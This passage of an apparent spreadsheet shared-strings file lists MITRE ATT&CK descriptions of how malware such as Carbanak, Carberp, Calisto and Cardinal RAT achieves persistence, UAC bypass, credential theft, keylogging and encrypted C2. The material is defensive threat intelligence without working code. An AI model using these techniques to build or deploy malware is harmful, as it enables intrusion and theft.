    <t>[CORESHELL](https://attack.mitre.org/software/S0137) obfuscates strings using a custom stream cipher.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) is installed via execution of rundll32 with an export named "init" or "InitW."(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) C2 messages are Base64-encoded.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) can communicate over HTTP for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has come signed with revoked certificates.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has the ability to self delete.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has the ability to remove values it writes to the Registry.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can download additional tools to a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has been delivered via malicious documents with embedded macros.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has attempted to appear as a legitimate Windows service with a fake description claiming it is used to support packed applications.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can write to the Registry under the &lt;code&gt;%windir%&lt;/code&gt; variable to execute tasks.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can use the schtasks utility to bypass UAC.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has been packed with UPX.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can search loaded modules, PEB structure, file paths, Registry keys, and memory to determine if it is being debugged or running in a virtual environment.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can use GET requests to download additional payloads from C2.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>Cached Domain Credentials</t>
  </si>
  <si>
    <t>[Cachedump](https://attack.mitre.org/software/S0119) can extract cached password hashes from cache entry information.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to identify open windows on the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to compress stolen data into a .cab file.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to record audio from the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal data from the clipboard.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to log keystrokes on the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal information about printers and the documents sent to printers.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to capture screenshots and webcam photos.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to discover information about the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) adds permissions and remote logins to all users.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses the &lt;code&gt;zip -r&lt;/code&gt; command to compress the data collected on the local system.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) collects information on bookmarks from Google Chrome.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) can collect data from user directories.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to use &lt;code&gt;rm -rf&lt;/code&gt; to remove folders and files from the victim's machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) presents an input prompt asking for the user's login and password.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to upload and download files to the victim's machine.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) collects Keychain storage data and copies those passwords/tokens to a file.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) adds a .plist file to the /Library/LaunchAgents folder to maintain persistence.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses launchctl to enable screen sharing on the victim’s machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to add its own account to the victim's machine.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274)'s installation file is an unsigned DMG image under the guise of Intego’s security solution for mac.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) runs the &lt;code&gt;ifconfig&lt;/code&gt; command to obtain the IP address from the victim’s machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) has the capability to download a file to the victim from the C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) uses AES to encrypt C2 traffic.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) has the capability to create a reverse shell on victims.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) exfiltrates collected data over email via SMTP/S and POP3/S C2 channels.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can obtain victim drive information as well as a list of folders in C:\Program Files.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can download a payload for execution.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) uses SMTP/S and POP3/S for C2 communications by sending and receiving emails.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can obtain a list of processes running on the system.(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can take a screenshot of the desktop.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can gather system information from the victim’s machine such as the OS version, machine name, and drive information.(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can gather the username from the system.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) can collect the current time zone information from the victim’s machine.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) adds the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt; to establish persistence.(Citation: Unit42 Cannon Nov 2018)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) exfiltrates data in compressed chunks if a message is larger than 4096 bytes .(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a command to delete files.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) logs key strokes for configured processes and sends them back to the C2 server.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) can create a Windows account.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>Local Email Collection</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) obtains Windows logon password details.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encrypts strings to make analysis more difficult.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>Portable Executable Injection</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) downloads an executable and injects it directly into a new process.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) lists running processes.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) checks the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings&lt;/code&gt; for proxy configurations information.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a plugin for VNC and Ammyy Admin Tool.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) enables concurrent Remote Desktop Protocol (RDP) sessions.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encodes the message body of HTTP traffic with Base64.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) encrypts the message body of HTTP traffic with RC2 (in CBC mode). [Carbanak](https://attack.mitre.org/software/S0030) also uses XOR with random keys for its communications.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>The [Carbanak](https://attack.mitre.org/software/S0030) malware communicates to its command server using HTTP with an encrypted payload.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) has a command to create a reverse shell.(Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has queued an APC routine to explorer.exe by calling ZwQueueApcThread.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has installed a bootkit on the system to maintain persistence.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>Credential API Hooking</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has hooked several Windows API functions during its Man in the Browser attack to steal credentials.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484)'s bootkit can inject a malicious DLL into the address space of running processes.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has exfiltrated data via HTTP to already established C2 servers.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation.(Citation: ESET Carberp March 2012)(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has created a hidden file in the Startup folder of the current user.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can download and execute new plugins from the C2 server. (Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has captured credentials when a user performs login through a SSL session.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has masqueraded as Windows system file names, as well as "chkntfs.exe" and "syscron.exe".(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used the NtQueryDirectoryFile and ZwQueryDirectoryFile functions to hide files and directories.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used XOR-based encryption to mask C2 server locations within the trojan.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has collected a list of running processes.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has searched the Image File Execution Options registry key for "Debugger" within every subkey.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has maintained persistence by placing itself inside the current user's startup folder.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has used user mode rootkit techniques to remain hidden on the system.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can capture display screenshots with the screens_dll.dll plugin.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has queried the infected system's registry searching for specific registry keys associated with antivirus products.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has collected the operating system version from the infected system.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>VNC</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) can start a remote VNC session by downloading a new plugin.(Citation: Prevx Carberp March 2011)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.(Citation: ESET Carberp March 2012)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) has connected to C2 servers via HTTP.(Citation: Trusteer Carberp October 2010)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) has used RSA encryption for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) decrypts task and configuration files for execution.(Citation: ESET Carbon Mar 2017)(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) has a command to inject code into a process.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses HTTP to send data to the C2 server.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) creates a base directory that contains the files and folders that are collected.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses TCP and UDP for C2.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm.(Citation: ESET Carbon Mar 2017)(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;net group&lt;/code&gt; command.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can list the processes on the victim’s machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) enumerates values in the Registry.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;net view&lt;/code&gt; command.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) creates several tasks for later execution to continue persistence on the victim’s machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can collect the IP address of the victims and other computers on the network using the commands: &lt;code&gt;ipconfig -all&lt;/code&gt; &lt;code&gt;nbtstat -n&lt;/code&gt;, and &lt;code&gt;nbtstat -s&lt;/code&gt;.(Citation: ESET Carbon Mar 2017)(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;netstat -r&lt;/code&gt; and &lt;code&gt;netstat -an&lt;/code&gt; commands.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) uses the command &lt;code&gt;net time \\127.0.0.1&lt;/code&gt; to get information the system’s time.(Citation: GovCERT Carbon May 2016)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can use HTTP in C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) can use Pastebin to receive C2 commands.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) establishes persistence by creating a service and naming it based off the operating system version running on the current machine.(Citation: ESET Carbon Mar 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) applies compression to C2 traffic using the ZLIB library.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) decodes many of its artifacts and is decrypted (AES-128) after being downloaded.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can communicate over multiple C2 host and port combinations.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can uninstall itself, including deleting its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path (else it will rewrite the payload).(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can download and execute additional payloads.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can log keystrokes.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) lures victims into executing malicious macros embedded within Microsoft Excel documents.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) sets &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cardinal RAT](https://attack.mitre.org/software/S0348) encodes many of its artifacts and is encrypted (AES-128) when downloaded.(Citation: PaloAlto CardinalRat Apr 2017) </t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) contains watchdog functionality that ensures its process is always running, else spawns a new instance.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) injects into a newly spawned process created from a native Windows executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can act as a reverse proxy.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) contains watchdog functionality that periodically ensures &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; is set to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) establishes Persistence by setting the  &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; Registry key to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can capture screenshots.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) uses a secret key with a series of XOR and addition operations to encrypt C2 traffic.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can collect the username from a victim machine.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) is downloaded using HTTP over port 443.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) can execute commands.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) obtains application windows titles and then determines which windows to perform [Screen Capture](https://attack.mitre.org/techniques/T1113) on.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) steals data stored in the clipboard.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) collects keystrokes from the victim’s machine.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) stores the gathered data from the machine in .db files and .bmp files under four separate locations.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) creates three Registry keys to establish persistence by adding a [Windows Service](https://attack.mitre.org/techniques/T1543/003).(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) captures screenshots based on specific keywords in the window’s title.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) gathers the Mac address, IP address, and the network adapter information from the victim’s machine.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) adds a new service named NetAdapter to establish persistence.(Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to perform brute force attacks on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to collect information from the local database.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can upload files over the C2 channel.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can search for files in directories.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to download and upload files to the system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of local groups of users from a system.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a command to modify a Registry key.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to use a port scanner on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can gather a list of processes running on the machine.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to use a rootkit on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to gather information from the compromrised asset, including the computer version, computer name, IIS version, and more.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can gather the IP address from the victim's machine using the IP config command.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of user accounts from a victim's machine.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of the services from a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can run commands on the compromised asset with CMD functions.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
